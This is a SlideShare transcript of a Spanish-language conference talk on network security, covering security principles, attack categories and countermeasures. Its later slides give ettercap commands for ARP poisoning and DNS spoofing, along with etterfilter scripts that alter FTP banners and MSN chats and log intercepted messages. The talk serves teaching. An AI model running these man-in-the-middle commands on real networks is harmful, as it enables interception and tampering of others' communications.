SlideShare una empresa de Scribd logo
1 de 40
III Congreso Boliviano  de Ingeniería y Tecnología Seguridad en redes Ing. Jorge Orellana Araoz Docente Investigador MEMI-UMSS Univ. Gonzalo Nina Auxiliar Centro MEMI-UMSS
Seguridad La seguridad de las redes es una parte integral de las redes informáticas. Incluye protocolos, tecnologías, dispositivos, herramientas y técnicas que aseguran los datos y reducen las amenazas.  La mayor motivación de la seguridad en redes es el esfuerzo por mantenerse un paso más adelante de los hackers malintencionados. Del mismo modo que los médicos intentan prevenir nuevas enfermedades tratando problemas existentes, los profesionales de la seguridad en redes intentan prevenir ataques minimizando los efectos de los ataques en tiempo real.  2
Seguridad
Confidencialidad Integridad Disponibilidad Propiedades de la SeguridadInformatica
Procesamiento Almacenamiento Transmision Estados de la Informacion
Politicas y Procedimientos Tecnologia Educacion, Entrenamiento, y Conocimiento Medidas de Seguridad
Procesamiento Almacenamiento Transmision Confidencialidad Integridad Disponibilidad Politicas y Procedimientos Tecnologia Educacion, Entrenamiento, y Conocimiento Modelo de Seguridad de Informacion
Administracion de Riesgos El proceso de asegurar y cuantificar los riesgos hasta establecer un nivel aceptable de riesgo en la organización. El riego puede ser mitigado, pero nunca eliminado.
Amenazas a la Seguridad 9 Ataques de reconocimiento Descubrimiento y mapeo de sistemas, servicios o vulnerabilidades sin autorización.  Ataques de acceso Explotar vulnerabilidades conocidas en servicios de autenticación, FTP y web para ganar acceso a cuentas web, bases de datos confidenciales y otra información sensible.  Ataques de Denegación de Servicio Envíar un número extremadamente grande de solicitudes en una red o Internet. Estas solicitudes excesivas hacen que la calidad de funcionamiento del dispositivo víctima sea inferior y no estar disponible para acceso y uso legítimo.
Ataques de Reconocimiento 10 ,[object Object]
Barridos de ping
Escaneo de puertos
Búsquedas de información en Internet ,[object Object]
Explotación de la confianza
Redirección de puerto
Ataque Man in theMiddle
Desbordamiento de buffer,[object Object]
Teardrop Attacks
Smurf Attack
DNS Attacks
Email Attacks
Physical Infrastructure Attacks
Viruses/Worms,[object Object]
Etapas de un ataque Hoy en dia los atacantestienengrancantidad de blancos de ataque. Su grandesafioesseleccionarlasvictimasmasvulnerables.  Para estorealizanataquesmuybienplaneados y estructurados.  Estosataquestienenetapaslogisticas y estrategicascomunes: Reconocimiento Exploracion (direcciones, puertos, vulnerabilidades) Ganaracceso MantenerAcceso CubrirPistas
Contramedidas DMZ/NAT IDS/IPS Content Filtering/NAC Firewalls/proxy services Authentication/Authorization/Accounting Self-defending networks Policies, procedures, standards guidelines Training and awareness
Ataques En Redes LAN La seguridad en Redes LAN es muchas veces inexistente y para probarlo se describen los pasos necesarios para realizar algunos ataques en redes de area local.  Escenario Una red de area local (LAN) equipos interconectados mediante dispositivos de networking como ser concentradores (HUBs) o encaminadores (switch). El equipo atacante tiene que estar en la misma red que el equipo victima. 16
Envenenamiento ARP  Lanzar ataque: root@bt#ettercap -T -q -i eth0 -M arp:remote MAC/IP/PUERTO MAC/IP/PUERTO Donde: - T : modo Texto - q : quiet(No hace ruido) no muestra todo lo que captura solo lo importante. -  i : Eleccion de la interfaz -  M : Metodoarp 17
Envenenamiento ARP
Envenenamiento ARP
Envenenamiento ARP
Envenenamiento ARP 21
Envenenamiento ARP 22
Envenenamiento ARP 23
Envenenamiento ARP 24
DNS Spoof 1. Editar archivo de conguracion DNS /usr/share/ettercap/etter.dns dominio A direccion-ip 25
DNS Spoof 2. Lanzar el Ataque:  root@bt#ettercap -T -q -i eth0 -P dnsspoof -M arp:remote MAC/IP/PUERTO MAC/IP/PUERTO ,[object Object]
 q : quiet(No hace ruido) no muestra todo lo que captura solo lo importante.
i : Eleccion de la interfaz
P : Activa el plugindnsspoof(previa conguracion)-  M : Metodoarp -  P : Activa el plugindnsspoof

Más contenido relacionado

La actualidad más candente

1 categorias-ataques
1 categorias-ataques1 categorias-ataques
1 categorias-ataquesmvrodriguez
 
Tipos de Ataques Informaticos
Tipos de Ataques InformaticosTipos de Ataques Informaticos
Tipos de Ataques Informaticossm2099
 
Redes Y Seguridad InformáTica
Redes Y Seguridad InformáTicaRedes Y Seguridad InformáTica
Redes Y Seguridad InformáTicaguestb47f49
 
Seguridad y amenazas en la red.
Seguridad y amenazas en la red.Seguridad y amenazas en la red.
Seguridad y amenazas en la red.guestf3ba8a
 
Seguridad en Redes
Seguridad en RedesSeguridad en Redes
Seguridad en Redesoligormar
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informaticamesiefrank
 
Trabajo practico de informatica 4
Trabajo practico de informatica 4Trabajo practico de informatica 4
Trabajo practico de informatica 4Shay Chocobar
 
Acceso No Autorizado A Servicios InformáTicos
Acceso No Autorizado A Servicios InformáTicosAcceso No Autorizado A Servicios InformáTicos
Acceso No Autorizado A Servicios InformáTicosAbel
 
Redes Y Seguridad InformáTica
Redes Y Seguridad InformáTicaRedes Y Seguridad InformáTica
Redes Y Seguridad InformáTicasablaz
 
Las redes y su seguridad
Las redes y su seguridadLas redes y su seguridad
Las redes y su seguridadDignaMariaBD
 
SEGURIDAD EN REDES INFORMÁTICAS
SEGURIDAD EN REDES INFORMÁTICASSEGURIDAD EN REDES INFORMÁTICAS
SEGURIDAD EN REDES INFORMÁTICASjavierhrobayo
 
Ataque a servidores
Ataque a servidoresAtaque a servidores
Ataque a servidoresJose Ruiz
 

La actualidad más candente (20)

1 categorias-ataques
1 categorias-ataques1 categorias-ataques
1 categorias-ataques
 
Tipos de Ataques Informaticos
Tipos de Ataques InformaticosTipos de Ataques Informaticos
Tipos de Ataques Informaticos
 
Ataque a la red de datos, diapositivas
Ataque a la red de datos, diapositivasAtaque a la red de datos, diapositivas
Ataque a la red de datos, diapositivas
 
Ataques Informáticos
Ataques InformáticosAtaques Informáticos
Ataques Informáticos
 
Virus y ataques informaticos
Virus y ataques informaticosVirus y ataques informaticos
Virus y ataques informaticos
 
Ataques informaticos
Ataques informaticosAtaques informaticos
Ataques informaticos
 
Redes Y Seguridad InformáTica
Redes Y Seguridad InformáTicaRedes Y Seguridad InformáTica
Redes Y Seguridad InformáTica
 
Seguridad en redes
Seguridad en redesSeguridad en redes
Seguridad en redes
 
Seguridad y amenazas en la red.
Seguridad y amenazas en la red.Seguridad y amenazas en la red.
Seguridad y amenazas en la red.
 
Seguridad en Redes
Seguridad en RedesSeguridad en Redes
Seguridad en Redes
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informatica
 
Tipos de ataques informáticos
Tipos de ataques informáticosTipos de ataques informáticos
Tipos de ataques informáticos
 
Trabajo practico de informatica 4
Trabajo practico de informatica 4Trabajo practico de informatica 4
Trabajo practico de informatica 4
 
Presentacion 4 Seguridad En Redes Ip
Presentacion 4 Seguridad En Redes IpPresentacion 4 Seguridad En Redes Ip
Presentacion 4 Seguridad En Redes Ip
 
Acceso No Autorizado A Servicios InformáTicos
Acceso No Autorizado A Servicios InformáTicosAcceso No Autorizado A Servicios InformáTicos
Acceso No Autorizado A Servicios InformáTicos
 
Privacidad en la red Tema 13
Privacidad en la red Tema 13Privacidad en la red Tema 13
Privacidad en la red Tema 13
 
Redes Y Seguridad InformáTica
Redes Y Seguridad InformáTicaRedes Y Seguridad InformáTica
Redes Y Seguridad InformáTica
 
Las redes y su seguridad
Las redes y su seguridadLas redes y su seguridad
Las redes y su seguridad
 
SEGURIDAD EN REDES INFORMÁTICAS
SEGURIDAD EN REDES INFORMÁTICASSEGURIDAD EN REDES INFORMÁTICAS
SEGURIDAD EN REDES INFORMÁTICAS
 
Ataque a servidores
Ataque a servidoresAtaque a servidores
Ataque a servidores
 

Destacado

9.1 security attacks
9.1 security attacks9.1 security attacks
9.1 security attacksEdwin Vargas
 
Firewall - IPCop
Firewall - IPCopFirewall - IPCop
Firewall - IPCopFaniMR
 
Fundamentos de seguridad en los sistemas de información aula 2.0
Fundamentos de seguridad en los sistemas de información aula 2.0Fundamentos de seguridad en los sistemas de información aula 2.0
Fundamentos de seguridad en los sistemas de información aula 2.0Gerardo T. Ortega Carrasquillo
 
Fundamentos Seguridad Informatica Clase 1
Fundamentos Seguridad Informatica Clase 1Fundamentos Seguridad Informatica Clase 1
Fundamentos Seguridad Informatica Clase 1Marco Antonio
 
Diapositivos ,unidades y perifericos
Diapositivos ,unidades y perifericosDiapositivos ,unidades y perifericos
Diapositivos ,unidades y perifericosChenny3
 
Ups Y Regulador De Voltaje
Ups Y Regulador De VoltajeUps Y Regulador De Voltaje
Ups Y Regulador De VoltajeMauricio Zárate
 
Seguridad i nseguridad_linux
Seguridad i nseguridad_linuxSeguridad i nseguridad_linux
Seguridad i nseguridad_linuxNbsecurity
 
Topología de UPS
Topología de UPSTopología de UPS
Topología de UPSraquije
 
Presentación pc zombie, phishing, spim, spear phishing, ransomware, spam, scam
Presentación pc zombie, phishing, spim, spear phishing, ransomware, spam, scamPresentación pc zombie, phishing, spim, spear phishing, ransomware, spam, scam
Presentación pc zombie, phishing, spim, spear phishing, ransomware, spam, scamJosé David Mendoza
 
Sample exam information_security_foundation_latin_american_spanish
Sample exam information_security_foundation_latin_american_spanishSample exam information_security_foundation_latin_american_spanish
Sample exam information_security_foundation_latin_american_spanishedu25
 
T3ch fest leganes_final
T3ch fest leganes_finalT3ch fest leganes_final
T3ch fest leganes_finalRober Garamo
 
Ataques d do s
Ataques d do sAtaques d do s
Ataques d do slarry_2012
 
Cómo asegurar tu web .es contra ataques, malware, DDoS y ventajas de un CDN
Cómo asegurar tu web .es contra ataques, malware, DDoS y ventajas de un CDNCómo asegurar tu web .es contra ataques, malware, DDoS y ventajas de un CDN
Cómo asegurar tu web .es contra ataques, malware, DDoS y ventajas de un CDNHost Europe Iberia
 

Destacado (20)

Los atacantes y sus herramientas
Los atacantes y sus herramientasLos atacantes y sus herramientas
Los atacantes y sus herramientas
 
9.1 security attacks
9.1 security attacks9.1 security attacks
9.1 security attacks
 
Firewall - IPCop
Firewall - IPCopFirewall - IPCop
Firewall - IPCop
 
Fundamentos de seguridad en los sistemas de información aula 2.0
Fundamentos de seguridad en los sistemas de información aula 2.0Fundamentos de seguridad en los sistemas de información aula 2.0
Fundamentos de seguridad en los sistemas de información aula 2.0
 
Ser abogado y CISA.
Ser abogado y CISA.Ser abogado y CISA.
Ser abogado y CISA.
 
Fundamentos Seguridad Informatica Clase 1
Fundamentos Seguridad Informatica Clase 1Fundamentos Seguridad Informatica Clase 1
Fundamentos Seguridad Informatica Clase 1
 
Diapositivos ,unidades y perifericos
Diapositivos ,unidades y perifericosDiapositivos ,unidades y perifericos
Diapositivos ,unidades y perifericos
 
Ups Y Regulador De Voltaje
Ups Y Regulador De VoltajeUps Y Regulador De Voltaje
Ups Y Regulador De Voltaje
 
Seguridad i nseguridad_linux
Seguridad i nseguridad_linuxSeguridad i nseguridad_linux
Seguridad i nseguridad_linux
 
Regulador de corriente
Regulador de corrienteRegulador de corriente
Regulador de corriente
 
Topología de UPS
Topología de UPSTopología de UPS
Topología de UPS
 
Presentación pc zombie, phishing, spim, spear phishing, ransomware, spam, scam
Presentación pc zombie, phishing, spim, spear phishing, ransomware, spam, scamPresentación pc zombie, phishing, spim, spear phishing, ransomware, spam, scam
Presentación pc zombie, phishing, spim, spear phishing, ransomware, spam, scam
 
Firewall hw
Firewall hwFirewall hw
Firewall hw
 
Sample exam information_security_foundation_latin_american_spanish
Sample exam information_security_foundation_latin_american_spanishSample exam information_security_foundation_latin_american_spanish
Sample exam information_security_foundation_latin_american_spanish
 
Presentación Web application firewall
Presentación Web application firewallPresentación Web application firewall
Presentación Web application firewall
 
T3ch fest leganes_final
T3ch fest leganes_finalT3ch fest leganes_final
T3ch fest leganes_final
 
Presentación1
Presentación1Presentación1
Presentación1
 
Ataques d do s
Ataques d do sAtaques d do s
Ataques d do s
 
Cómo asegurar tu web .es contra ataques, malware, DDoS y ventajas de un CDN
Cómo asegurar tu web .es contra ataques, malware, DDoS y ventajas de un CDNCómo asegurar tu web .es contra ataques, malware, DDoS y ventajas de un CDN
Cómo asegurar tu web .es contra ataques, malware, DDoS y ventajas de un CDN
 
Crack Distribuido Atabuido
Crack Distribuido AtabuidoCrack Distribuido Atabuido
Crack Distribuido Atabuido
 

Similar a Seguridad de redes (congreso)

Seguridad Informática
Seguridad InformáticaSeguridad Informática
Seguridad InformáticaJosue Mendez
 
Ciberseguridad Cómo identificar con certeza dispositivos comprometidos en la...
Ciberseguridad  Cómo identificar con certeza dispositivos comprometidos en la...Ciberseguridad  Cómo identificar con certeza dispositivos comprometidos en la...
Ciberseguridad Cómo identificar con certeza dispositivos comprometidos en la...HelpSystems
 
Seguridad Informatica
Seguridad InformaticaSeguridad Informatica
Seguridad InformaticaMini0986
 
seguridad informatica
seguridad informaticaseguridad informatica
seguridad informaticavrme
 
Sensibilizacion
SensibilizacionSensibilizacion
Sensibilizacionpredeitor
 
presentacion.pdfyjjjkjhjjhhkjhjjjkhhjhhhhh
presentacion.pdfyjjjkjhjjhhkjhjjjkhhjhhhhhpresentacion.pdfyjjjkjhjjhhkjhjjjkhhjhhhhh
presentacion.pdfyjjjkjhjjhhkjhjjjkhhjhhhhhNiltonTenorio
 
Unidad 6 Seguridad en redes corporativas
Unidad 6 Seguridad en redes corporativasUnidad 6 Seguridad en redes corporativas
Unidad 6 Seguridad en redes corporativasvverdu
 
Seguridad en Redes
Seguridad en RedesSeguridad en Redes
Seguridad en RedesLalo Gomez
 
Guerra contra los_ciberataques_ dirigidos1
Guerra contra los_ciberataques_ dirigidos1Guerra contra los_ciberataques_ dirigidos1
Guerra contra los_ciberataques_ dirigidos1lulops
 
Tecnicas de intrusion y contramedidas Oscar Gonzalez - Gabriel Ramirez
Tecnicas de intrusion y contramedidas Oscar Gonzalez - Gabriel RamirezTecnicas de intrusion y contramedidas Oscar Gonzalez - Gabriel Ramirez
Tecnicas de intrusion y contramedidas Oscar Gonzalez - Gabriel RamirezOscar Gonzalez
 
Metodología de Defensa Basada en NIST CSF
Metodología de Defensa Basada en NIST CSFMetodología de Defensa Basada en NIST CSF
Metodología de Defensa Basada en NIST CSFCristian Garcia G.
 

Similar a Seguridad de redes (congreso) (20)

Seguridad Informática
Seguridad InformáticaSeguridad Informática
Seguridad Informática
 
Ciberseguridad Cómo identificar con certeza dispositivos comprometidos en la...
Ciberseguridad  Cómo identificar con certeza dispositivos comprometidos en la...Ciberseguridad  Cómo identificar con certeza dispositivos comprometidos en la...
Ciberseguridad Cómo identificar con certeza dispositivos comprometidos en la...
 
Seguridad Informatica
Seguridad InformaticaSeguridad Informatica
Seguridad Informatica
 
5to
5to5to
5to
 
Tema 3 ataques
Tema 3 ataquesTema 3 ataques
Tema 3 ataques
 
Tema 3 ataques
Tema 3 ataquesTema 3 ataques
Tema 3 ataques
 
Presentacion_1
Presentacion_1Presentacion_1
Presentacion_1
 
Presentación1
Presentación1Presentación1
Presentación1
 
Presentación1
Presentación1Presentación1
Presentación1
 
seguridad informatica
seguridad informaticaseguridad informatica
seguridad informatica
 
Sensibilizacion
SensibilizacionSensibilizacion
Sensibilizacion
 
presentacion.pdfyjjjkjhjjhhkjhjjjkhhjhhhhh
presentacion.pdfyjjjkjhjjhhkjhjjjkhhjhhhhhpresentacion.pdfyjjjkjhjjhhkjhjjjkhhjhhhhh
presentacion.pdfyjjjkjhjjhhkjhjjjkhhjhhhhh
 
Unidad 6 Seguridad en redes corporativas
Unidad 6 Seguridad en redes corporativasUnidad 6 Seguridad en redes corporativas
Unidad 6 Seguridad en redes corporativas
 
Segurida de redes
Segurida de redesSegurida de redes
Segurida de redes
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informatica
 
Seguridad en Redes
Seguridad en RedesSeguridad en Redes
Seguridad en Redes
 
Gestion
GestionGestion
Gestion
 
Guerra contra los_ciberataques_ dirigidos1
Guerra contra los_ciberataques_ dirigidos1Guerra contra los_ciberataques_ dirigidos1
Guerra contra los_ciberataques_ dirigidos1
 
Tecnicas de intrusion y contramedidas Oscar Gonzalez - Gabriel Ramirez
Tecnicas de intrusion y contramedidas Oscar Gonzalez - Gabriel RamirezTecnicas de intrusion y contramedidas Oscar Gonzalez - Gabriel Ramirez
Tecnicas de intrusion y contramedidas Oscar Gonzalez - Gabriel Ramirez
 
Metodología de Defensa Basada en NIST CSF
Metodología de Defensa Basada en NIST CSFMetodología de Defensa Basada en NIST CSF
Metodología de Defensa Basada en NIST CSF
 

Último

Proyecto de reforma por los Derechos Políticos y Régimen Electoral
Proyecto de reforma por los Derechos Políticos y Régimen ElectoralProyecto de reforma por los Derechos Políticos y Régimen Electoral
Proyecto de reforma por los Derechos Políticos y Régimen ElectoralEduardo Nelson German
 
Proyecto por la Regionalización y la Función Municipal
Proyecto por la Regionalización y la Función MunicipalProyecto por la Regionalización y la Función Municipal
Proyecto por la Regionalización y la Función MunicipalEduardo Nelson German
 
TERRASOL FELICITA A LILIANA ROJAS SILVA.pdf
TERRASOL FELICITA A LILIANA ROJAS SILVA.pdfTERRASOL FELICITA A LILIANA ROJAS SILVA.pdf
TERRASOL FELICITA A LILIANA ROJAS SILVA.pdfmegaradioexpress
 
Proyecto para reformar la Libertad de Expresión
Proyecto para reformar la Libertad de ExpresiónProyecto para reformar la Libertad de Expresión
Proyecto para reformar la Libertad de ExpresiónEduardo Nelson German
 
Observatorio Digital de los Gobernadores
Observatorio Digital de los GobernadoresObservatorio Digital de los Gobernadores
Observatorio Digital de los GobernadoresEconomis
 
1er y 2do gobierno alan garcia final.pptx
1er y 2do gobierno alan garcia final.pptx1er y 2do gobierno alan garcia final.pptx
1er y 2do gobierno alan garcia final.pptxJohanaManuelaSolisPa
 
concesion gruas ssp gruas m2 xalapa_.pdf
concesion gruas ssp gruas m2 xalapa_.pdfconcesion gruas ssp gruas m2 xalapa_.pdf
concesion gruas ssp gruas m2 xalapa_.pdfredaccionxalapa
 
Proyecto sobre la Libertad de Conciencia Cívica
Proyecto sobre la Libertad de Conciencia CívicaProyecto sobre la Libertad de Conciencia Cívica
Proyecto sobre la Libertad de Conciencia CívicaEduardo Nelson German
 
Partidos políticos, presentación sobre el partido político morena.
Partidos políticos, presentación sobre el partido político morena.Partidos políticos, presentación sobre el partido político morena.
Partidos políticos, presentación sobre el partido político morena.soffponce2
 
Horarios de cortes de luz en Los Ríos para este lunes, 22 de abril, según CNEL
Horarios de cortes de luz en Los Ríos para este lunes, 22 de abril, según CNELHorarios de cortes de luz en Los Ríos para este lunes, 22 de abril, según CNEL
Horarios de cortes de luz en Los Ríos para este lunes, 22 de abril, según CNELRobertoEspinozaMogro
 
IDEA Perú Percepciones sobre la Democracia y Valores Democráticos 2024.pdf
IDEA Perú Percepciones sobre la Democracia y Valores Democráticos 2024.pdfIDEA Perú Percepciones sobre la Democracia y Valores Democráticos 2024.pdf
IDEA Perú Percepciones sobre la Democracia y Valores Democráticos 2024.pdfEsauEspinozaCardenas
 
PRECIOS_M_XIMOS_VIGENTES_DEL_21_AL_27_DE_ABRIL_DE_2024.pdf
PRECIOS_M_XIMOS_VIGENTES_DEL_21_AL_27_DE_ABRIL_DE_2024.pdfPRECIOS_M_XIMOS_VIGENTES_DEL_21_AL_27_DE_ABRIL_DE_2024.pdf
PRECIOS_M_XIMOS_VIGENTES_DEL_21_AL_27_DE_ABRIL_DE_2024.pdfredaccionxalapa
 
La Corte rechazó la demanda de Quintela contra DNU
La Corte rechazó la demanda de Quintela contra DNULa Corte rechazó la demanda de Quintela contra DNU
La Corte rechazó la demanda de Quintela contra DNUEduardo Nelson German
 
Boletín semanal informativo 15 Abril 2024
Boletín semanal informativo 15 Abril 2024Boletín semanal informativo 15 Abril 2024
Boletín semanal informativo 15 Abril 2024Nueva Canarias-BC
 
generalidades-del-derecho-de-sucesiones (1).pptx
generalidades-del-derecho-de-sucesiones (1).pptxgeneralidades-del-derecho-de-sucesiones (1).pptx
generalidades-del-derecho-de-sucesiones (1).pptxSTEVINBRANDONHUAMANA
 
Carta WPM petición alto al fuego en Gaza
Carta WPM petición alto al fuego en GazaCarta WPM petición alto al fuego en Gaza
Carta WPM petición alto al fuego en GazateleSUR TV
 
Proyecto para la reforma de la Función Judicial
Proyecto para la reforma de la Función JudicialProyecto para la reforma de la Función Judicial
Proyecto para la reforma de la Función JudicialEduardo Nelson German
 
Topología discursiva del Movimiento Justicialista
Topología discursiva del Movimiento JusticialistaTopología discursiva del Movimiento Justicialista
Topología discursiva del Movimiento JusticialistaJulio Otero Santamaría
 
MAPA DEL TALENTO 2023 de Cotec e Instituto Valenciano de Investigaciones Econ...
MAPA DEL TALENTO 2023 de Cotec e Instituto Valenciano de Investigaciones Econ...MAPA DEL TALENTO 2023 de Cotec e Instituto Valenciano de Investigaciones Econ...
MAPA DEL TALENTO 2023 de Cotec e Instituto Valenciano de Investigaciones Econ...DiariodeNoticiasZero
 

Último (20)

Proyecto de reforma por los Derechos Políticos y Régimen Electoral
Proyecto de reforma por los Derechos Políticos y Régimen ElectoralProyecto de reforma por los Derechos Políticos y Régimen Electoral
Proyecto de reforma por los Derechos Políticos y Régimen Electoral
 
Proyecto por la Regionalización y la Función Municipal
Proyecto por la Regionalización y la Función MunicipalProyecto por la Regionalización y la Función Municipal
Proyecto por la Regionalización y la Función Municipal
 
TERRASOL FELICITA A LILIANA ROJAS SILVA.pdf
TERRASOL FELICITA A LILIANA ROJAS SILVA.pdfTERRASOL FELICITA A LILIANA ROJAS SILVA.pdf
TERRASOL FELICITA A LILIANA ROJAS SILVA.pdf
 
Proyecto para reformar la Libertad de Expresión
Proyecto para reformar la Libertad de ExpresiónProyecto para reformar la Libertad de Expresión
Proyecto para reformar la Libertad de Expresión
 
Observatorio Digital de los Gobernadores
Observatorio Digital de los GobernadoresObservatorio Digital de los Gobernadores
Observatorio Digital de los Gobernadores
 
1er y 2do gobierno alan garcia final.pptx
1er y 2do gobierno alan garcia final.pptx1er y 2do gobierno alan garcia final.pptx
1er y 2do gobierno alan garcia final.pptx
 
concesion gruas ssp gruas m2 xalapa_.pdf
concesion gruas ssp gruas m2 xalapa_.pdfconcesion gruas ssp gruas m2 xalapa_.pdf
concesion gruas ssp gruas m2 xalapa_.pdf
 
LA CRÓNICA COMARCA DE ANTEQUERA _ Nº 1077
LA CRÓNICA COMARCA DE ANTEQUERA _ Nº 1077LA CRÓNICA COMARCA DE ANTEQUERA _ Nº 1077
LA CRÓNICA COMARCA DE ANTEQUERA _ Nº 1077
 
Proyecto sobre la Libertad de Conciencia Cívica
Proyecto sobre la Libertad de Conciencia CívicaProyecto sobre la Libertad de Conciencia Cívica
Proyecto sobre la Libertad de Conciencia Cívica
 
Partidos políticos, presentación sobre el partido político morena.
Partidos políticos, presentación sobre el partido político morena.Partidos políticos, presentación sobre el partido político morena.
Partidos políticos, presentación sobre el partido político morena.
 
Horarios de cortes de luz en Los Ríos para este lunes, 22 de abril, según CNEL
Horarios de cortes de luz en Los Ríos para este lunes, 22 de abril, según CNELHorarios de cortes de luz en Los Ríos para este lunes, 22 de abril, según CNEL
Horarios de cortes de luz en Los Ríos para este lunes, 22 de abril, según CNEL
 
IDEA Perú Percepciones sobre la Democracia y Valores Democráticos 2024.pdf
IDEA Perú Percepciones sobre la Democracia y Valores Democráticos 2024.pdfIDEA Perú Percepciones sobre la Democracia y Valores Democráticos 2024.pdf
IDEA Perú Percepciones sobre la Democracia y Valores Democráticos 2024.pdf
 
PRECIOS_M_XIMOS_VIGENTES_DEL_21_AL_27_DE_ABRIL_DE_2024.pdf
PRECIOS_M_XIMOS_VIGENTES_DEL_21_AL_27_DE_ABRIL_DE_2024.pdfPRECIOS_M_XIMOS_VIGENTES_DEL_21_AL_27_DE_ABRIL_DE_2024.pdf
PRECIOS_M_XIMOS_VIGENTES_DEL_21_AL_27_DE_ABRIL_DE_2024.pdf
 
La Corte rechazó la demanda de Quintela contra DNU
La Corte rechazó la demanda de Quintela contra DNULa Corte rechazó la demanda de Quintela contra DNU
La Corte rechazó la demanda de Quintela contra DNU
 
Boletín semanal informativo 15 Abril 2024
Boletín semanal informativo 15 Abril 2024Boletín semanal informativo 15 Abril 2024
Boletín semanal informativo 15 Abril 2024
 
generalidades-del-derecho-de-sucesiones (1).pptx
generalidades-del-derecho-de-sucesiones (1).pptxgeneralidades-del-derecho-de-sucesiones (1).pptx
generalidades-del-derecho-de-sucesiones (1).pptx
 
Carta WPM petición alto al fuego en Gaza
Carta WPM petición alto al fuego en GazaCarta WPM petición alto al fuego en Gaza
Carta WPM petición alto al fuego en Gaza
 
Proyecto para la reforma de la Función Judicial
Proyecto para la reforma de la Función JudicialProyecto para la reforma de la Función Judicial
Proyecto para la reforma de la Función Judicial
 
Topología discursiva del Movimiento Justicialista
Topología discursiva del Movimiento JusticialistaTopología discursiva del Movimiento Justicialista
Topología discursiva del Movimiento Justicialista
 
MAPA DEL TALENTO 2023 de Cotec e Instituto Valenciano de Investigaciones Econ...
MAPA DEL TALENTO 2023 de Cotec e Instituto Valenciano de Investigaciones Econ...MAPA DEL TALENTO 2023 de Cotec e Instituto Valenciano de Investigaciones Econ...
MAPA DEL TALENTO 2023 de Cotec e Instituto Valenciano de Investigaciones Econ...
 

Seguridad de redes (congreso)

  • 1. III Congreso Boliviano de Ingeniería y Tecnología Seguridad en redes Ing. Jorge Orellana Araoz Docente Investigador MEMI-UMSS Univ. Gonzalo Nina Auxiliar Centro MEMI-UMSS
  • 2. Seguridad La seguridad de las redes es una parte integral de las redes informáticas. Incluye protocolos, tecnologías, dispositivos, herramientas y técnicas que aseguran los datos y reducen las amenazas. La mayor motivación de la seguridad en redes es el esfuerzo por mantenerse un paso más adelante de los hackers malintencionados. Del mismo modo que los médicos intentan prevenir nuevas enfermedades tratando problemas existentes, los profesionales de la seguridad en redes intentan prevenir ataques minimizando los efectos de los ataques en tiempo real. 2
  • 4. Confidencialidad Integridad Disponibilidad Propiedades de la SeguridadInformatica
  • 5. Procesamiento Almacenamiento Transmision Estados de la Informacion
  • 6. Politicas y Procedimientos Tecnologia Educacion, Entrenamiento, y Conocimiento Medidas de Seguridad
  • 7. Procesamiento Almacenamiento Transmision Confidencialidad Integridad Disponibilidad Politicas y Procedimientos Tecnologia Educacion, Entrenamiento, y Conocimiento Modelo de Seguridad de Informacion
  • 8. Administracion de Riesgos El proceso de asegurar y cuantificar los riesgos hasta establecer un nivel aceptable de riesgo en la organización. El riego puede ser mitigado, pero nunca eliminado.
  • 9. Amenazas a la Seguridad 9 Ataques de reconocimiento Descubrimiento y mapeo de sistemas, servicios o vulnerabilidades sin autorización. Ataques de acceso Explotar vulnerabilidades conocidas en servicios de autenticación, FTP y web para ganar acceso a cuentas web, bases de datos confidenciales y otra información sensible. Ataques de Denegación de Servicio Envíar un número extremadamente grande de solicitudes en una red o Internet. Estas solicitudes excesivas hacen que la calidad de funcionamiento del dispositivo víctima sea inferior y no estar disponible para acceso y uso legítimo.
  • 10.
  • 13.
  • 14. Explotación de la confianza
  • 16. Ataque Man in theMiddle
  • 17.
  • 23.
  • 24. Etapas de un ataque Hoy en dia los atacantestienengrancantidad de blancos de ataque. Su grandesafioesseleccionarlasvictimasmasvulnerables. Para estorealizanataquesmuybienplaneados y estructurados. Estosataquestienenetapaslogisticas y estrategicascomunes: Reconocimiento Exploracion (direcciones, puertos, vulnerabilidades) Ganaracceso MantenerAcceso CubrirPistas
  • 25. Contramedidas DMZ/NAT IDS/IPS Content Filtering/NAC Firewalls/proxy services Authentication/Authorization/Accounting Self-defending networks Policies, procedures, standards guidelines Training and awareness
  • 26. Ataques En Redes LAN La seguridad en Redes LAN es muchas veces inexistente y para probarlo se describen los pasos necesarios para realizar algunos ataques en redes de area local. Escenario Una red de area local (LAN) equipos interconectados mediante dispositivos de networking como ser concentradores (HUBs) o encaminadores (switch). El equipo atacante tiene que estar en la misma red que el equipo victima. 16
  • 27. Envenenamiento ARP Lanzar ataque: root@bt#ettercap -T -q -i eth0 -M arp:remote MAC/IP/PUERTO MAC/IP/PUERTO Donde: - T : modo Texto - q : quiet(No hace ruido) no muestra todo lo que captura solo lo importante. - i : Eleccion de la interfaz - M : Metodoarp 17
  • 35. DNS Spoof 1. Editar archivo de conguracion DNS /usr/share/ettercap/etter.dns dominio A direccion-ip 25
  • 36.
  • 37. q : quiet(No hace ruido) no muestra todo lo que captura solo lo importante.
  • 38. i : Eleccion de la interfaz
  • 39. P : Activa el plugindnsspoof(previa conguracion)- M : Metodoarp - P : Activa el plugindnsspoof
  • 40.
  • 41.
  • 42.
  • 45. Cambio de datos 1. Crear el filtro de cambio Archivo banner --------------------------------------------- # replace the FTP prompt por SSH if (tcp.src == 21) { replace("FTP","SSH"); } --------------------------------------------- 2. compilar: root@bt#etterfilterbanner -o banner.ef 3. Ejecutar el filtro + envenamiento ARP root@bt#ettercap -T -q -i eth0 -F banner.ef -M arp:remote MAC/IP/PUERTO MAC/IP/PUERTO 32
  • 46.
  • 47. Alteracion de Conversaciones (Caso MSN Messenger) 1. Crear el filtro de cambio Archivo msn ------------------------------------------------- 34
  • 48. Alteracion de Conversaciones(Caso MSN Messenger) 2. compilar: root@bt#etterfiltermsn -o msn.ef 3. Ejecutar el filtro + envenamiento ARP root@bt#ettercap -T -q -i eth0 -F msn.ef -M arp:remote MAC/IP/PUERTO MAC/IP/PUERTO 35
  • 49.
  • 50. Grabar Chat 1. Crear el filtro de guardar conversaciones Archivo ver chat -------------------------------------------------- if (tcp.src == 1863 || tcp.dst == 1863) { log(DATA.data, "/tmp/msn.log"); msg("Texto plano MSN Guardado!XD"); } -------------------------------------------------- 37
